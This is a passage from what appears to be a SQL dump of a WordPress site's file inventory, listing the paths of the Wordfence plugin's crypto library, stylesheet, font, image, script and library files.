5519/Fe.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(12026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(12027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(12028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(12029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(12030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(12031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(12032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(12033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(12034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(12035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(12036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(12037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(12038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(12039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(12040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(12041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(12042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(12043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(12044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(12045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(12046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(12047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(12048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(12049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(12050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(12051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(12052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/activity-report-widget.1695657196.css','wp-content/plugins/wordfence/css/activity-report-widget.1695657196.css'),(12053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/diff.1695657196.css','wp-content/plugins/wordfence/css/diff.1695657196.css'),(12054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/fullLog.1695657196.css','wp-content/plugins/wordfence/css/fullLog.1695657196.css'),(12055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(12056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(12057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(12058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(12059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(12060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(12061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/iptraf.1695657196.css','wp-content/plugins/wordfence/css/iptraf.1695657196.css'),(12062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1695657196.css','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1695657196.css'),(12063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.min.1695657196.css','wp-content/plugins/wordfence/css/jquery-ui.min.1695657196.css'),(12064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.structure.min.1695657196.css','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1695657196.css'),(12065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.theme.min.1695657196.css','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1695657196.css'),(12066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/care-global.1695657196.css','wp-content/plugins/wordfence/css/license/care-global.1695657196.css'),(12067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/care.1695657196.css','wp-content/plugins/wordfence/css/license/care.1695657196.css'),(12068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/free-global.1695657196.css','wp-content/plugins/wordfence/css/license/free-global.1695657196.css'),(12069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/free.1695657196.css','wp-content/plugins/wordfence/css/license/free.1695657196.css'),(12070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/premium-global.1695657196.css','wp-content/plugins/wordfence/css/license/premium-global.1695657196.css'),(12071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/premium.1695657196.css','wp-content/plugins/wordfence/css/license/premium.1695657196.css'),(12072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response-global.1695657196.css','wp-content/plugins/wordfence/css/license/response-global.1695657196.css'),(12073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response-variables.1695657196.css','wp-content/plugins/wordfence/css/license/response-variables.1695657196.css'),(12074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response.1695657196.css','wp-content/plugins/wordfence/css/license/response.1695657196.css'),(12075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/main.1695657196.css','wp-content/plugins/wordfence/css/main.1695657196.css'),(12076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/phpinfo.1695657196.css','wp-content/plugins/wordfence/css/phpinfo.1695657196.css'),(12077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-adminbar.1695657196.css','wp-content/plugins/wordfence/css/wf-adminbar.1695657196.css'),(12078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-colorbox.1695657196.css','wp-content/plugins/wordfence/css/wf-colorbox.1695657196.css'),(12079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-font-awesome.1695657196.css','wp-content/plugins/wordfence/css/wf-font-awesome.1695657196.css'),(12080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-global.1695657196.css','wp-content/plugins/wordfence/css/wf-global.1695657196.css'),(12081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-ionicons.1695657196.css','wp-content/plugins/wordfence/css/wf-ionicons.1695657196.css'),(12082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-onboarding.1695657196.css','wp-content/plugins/wordfence/css/wf-onboarding.1695657196.css'),(12083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-roboto-font.1695657196.css','wp-content/plugins/wordfence/css/wf-roboto-font.1695657196.css'),(12084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wfselect2.min.1695657196.css','wp-content/plugins/wordfence/css/wfselect2.min.1695657196.css'),(12085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wordfenceBox.1695657196.css','wp-content/plugins/wordfence/css/wordfenceBox.1695657196.css'),(12086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),(12087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/ionicons.woff','wp-content/plugins/wordfence/fonts/ionicons.woff'),(12088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),(12089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),(12090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),(12091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),(12092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),(12093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),(12094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),(12095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),(12096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),(12097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),(12098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/2fa-whole.svg','wp-content/plugins/wordfence/images/2fa-whole.svg'),(12099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/2fa1.svg','wp-content/plugins/wordfence/images/2fa1.svg'),(12100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/2fa2.svg','wp-content/plugins/wordfence/images/2fa2.svg'),(12101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/back_disabled.jpg','wp-content/plugins/wordfence/images/back_disabled.jpg'),(12102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/back_enabled.jpg','wp-content/plugins/wordfence/images/back_enabled.jpg'),(12103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/blocking.svg','wp-content/plugins/wordfence/images/blocking.svg'),(12104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/button-grad-grey.png','wp-content/plugins/wordfence/images/button-grad-grey.png'),(12105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/checkbox.png','wp-content/plugins/wordfence/images/checkbox.png'),(12106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/flags.png','wp-content/plugins/wordfence/images/flags.png'),(12107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/forward_disabled.jpg','wp-content/plugins/wordfence/images/forward_disabled.jpg'),(12108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/forward_enabled.jpg','wp-content/plugins/wordfence/images/forward_enabled.jpg'),(12109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/help.png','wp-content/plugins/wordfence/images/help.png'),(12110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajax24.gif','wp-content/plugins/wordfence/images/icons/ajax24.gif'),(12111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajax3.gif','wp-content/plugins/wordfence/images/icons/ajax3.gif'),(12112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxRed16.gif','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(12113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxScan.gif','wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(12114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(12115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/arrow_refresh.png','wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(12116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/bullet_yellow.png','wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(12117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check-care.svg','wp-content/plugins/wordfence/images/icons/check-care.svg'),(12118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check-premium.svg','wp-content/plugins/wordfence/images/icons/check-premium.svg'),(12119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check-response.svg','wp-content/plugins/wordfence/images/icons/check-response.svg'),(12120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check.svg','wp-content/plugins/wordfence/images/icons/check.svg'),(12121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/email_go.png','wp-content/plugins/wordfence/images/icons/email_go.png'),(12122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/error128.png','wp-content/plugins/wordfence/images/icons/error128.png'),(12123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/magnifier.png','wp-content/plugins/wordfence/images/icons/magnifier.png'),(12124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/tick128.png','wp-content/plugins/wordfence/images/icons/tick128.png'),(12125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/warning128.png','wp-content/plugins/wordfence/images/icons/warning128.png'),(12126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/working-indicator.gif','wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(12127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/lightbox-controls.png','wp-content/plugins/wordfence/images/lightbox-controls.png'),(12128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading.gif','wp-content/plugins/wordfence/images/loading.gif'),(12129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading_background.png','wp-content/plugins/wordfence/images/loading_background.png'),(12130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading_large.gif','wp-content/plugins/wordfence/images/loading_large.gif'),(12131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logo.png','wp-content/plugins/wordfence/images/logo.png'),(12132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-care.svg','wp-content/plugins/wordfence/images/logos/shield-care.svg'),(12133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-free.svg','wp-content/plugins/wordfence/images/logos/shield-free.svg'),(12134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-premium.svg','wp-content/plugins/wordfence/images/logos/shield-premium.svg'),(12135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-response.svg','wp-content/plugins/wordfence/images/logos/shield-response.svg'),(12136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-white.svg','wp-content/plugins/wordfence/images/logos/shield-white.svg'),(12137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/options.svg','wp-content/plugins/wordfence/images/options.svg'),(12138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/ratelimiting.svg','wp-content/plugins/wordfence/images/ratelimiting.svg'),(12139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc.gif','wp-content/plugins/wordfence/images/sort_asc.gif'),(12140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc.png','wp-content/plugins/wordfence/images/sort_asc.png'),(12141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc_disabled.gif','wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(12142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc_disabled.png','wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(12143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_both.gif','wp-content/plugins/wordfence/images/sort_both.gif'),(12144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_both.png','wp-content/plugins/wordfence/images/sort_both.png'),(12145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_desc.gif','wp-content/plugins/wordfence/images/sort_desc.gif'),(12146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_desc.png','wp-content/plugins/wordfence/images/sort_desc.png'),(12147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_desc_disabled.gif','wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(12148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_desc_disabled.png','wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(12149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/support.svg','wp-content/plugins/wordfence/images/support.svg'),(12150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/tools.svg','wp-content/plugins/wordfence/images/tools.svg'),(12151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/wf-central-logo.svg','wp-content/plugins/wordfence/images/wf-central-logo.svg'),(12152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/wf-error-badge.svg','wp-content/plugins/wordfence/images/wf-error-badge.svg'),(12153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/wf-horizontal.svg','wp-content/plugins/wordfence/images/wf-horizontal.svg'),(12154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/wordfence-logo.svg','wp-content/plugins/wordfence/images/wordfence-logo.svg'),(12155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/index.php','wp-content/plugins/wordfence/index.php'),(12156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/admin.1695657196.js','wp-content/plugins/wordfence/js/admin.1695657196.js'),(12157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/admin.ajaxWatcher.1695657196.js','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1695657196.js'),(12158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/admin.liveTraffic.1695657196.js','wp-content/plugins/wordfence/js/admin.liveTraffic.1695657196.js'),(12159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/chart.umd.1695657196.js','wp-content/plugins/wordfence/js/chart.umd.1695657196.js'),(12160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/date.1695657196.js','wp-content/plugins/wordfence/js/date.1695657196.js'),(12161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1695657196.js','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1695657196.js'),(12162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery.colorbox-min.1695657196.js','wp-content/plugins/wordfence/js/jquery.colorbox-min.1695657196.js'),(12163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery.colorbox.1695657196.js','wp-content/plugins/wordfence/js/jquery.colorbox.1695657196.js'),(12164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery.qrcode.min.1695657196.js','wp-content/plugins/wordfence/js/jquery.qrcode.min.1695657196.js'),(12165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery.tmpl.min.1695657196.js','wp-content/plugins/wordfence/js/jquery.tmpl.min.1695657196.js'),(12166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/knockout-3.5.1.1695657196.js','wp-content/plugins/wordfence/js/knockout-3.5.1.1695657196.js'),(12167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfdashboard.1695657196.js','wp-content/plugins/wordfence/js/wfdashboard.1695657196.js'),(12168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfdropdown.1695657196.js','wp-content/plugins/wordfence/js/wfdropdown.1695657196.js'),(12169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfglobal.1695657196.js','wp-content/plugins/wordfence/js/wfglobal.1695657196.js'),(12170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfi18n.1695657196.js','wp-content/plugins/wordfence/js/wfi18n.1695657196.js'),(12171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfonboarding.1695657196.js','wp-content/plugins/wordfence/js/wfonboarding.1695657196.js'),(12172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfpopover.1695657196.js','wp-content/plugins/wordfence/js/wfpopover.1695657196.js'),(12173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfselect2.min.1695657196.js','wp-content/plugins/wordfence/js/wfselect2.min.1695657196.js'),(12174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/languages/wordfence.mo','wp-content/plugins/wordfence/languages/wordfence.mo'),(12175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/languages/wordfence.pot','wp-content/plugins/wordfence/languages/wordfence.pot'),(12176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/.htaccess','wp-content/plugins/wordfence/lib/.htaccess'),(12177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(12178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(12179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(12180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(12181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff.php','wp-content/plugins/wordfence/lib/Diff.php'),(12182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(12183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/IPTraf.php','wp-content/plugins/wordfence/lib/IPTraf.php'),(12184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/IPTrafList.php','wp-content/plugins/wordfence/lib/IPTrafList.php'),(12185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(12186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/compat.php','wp-content/plugins/wordfence/lib/compat.php'),(12187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(12188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(12189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_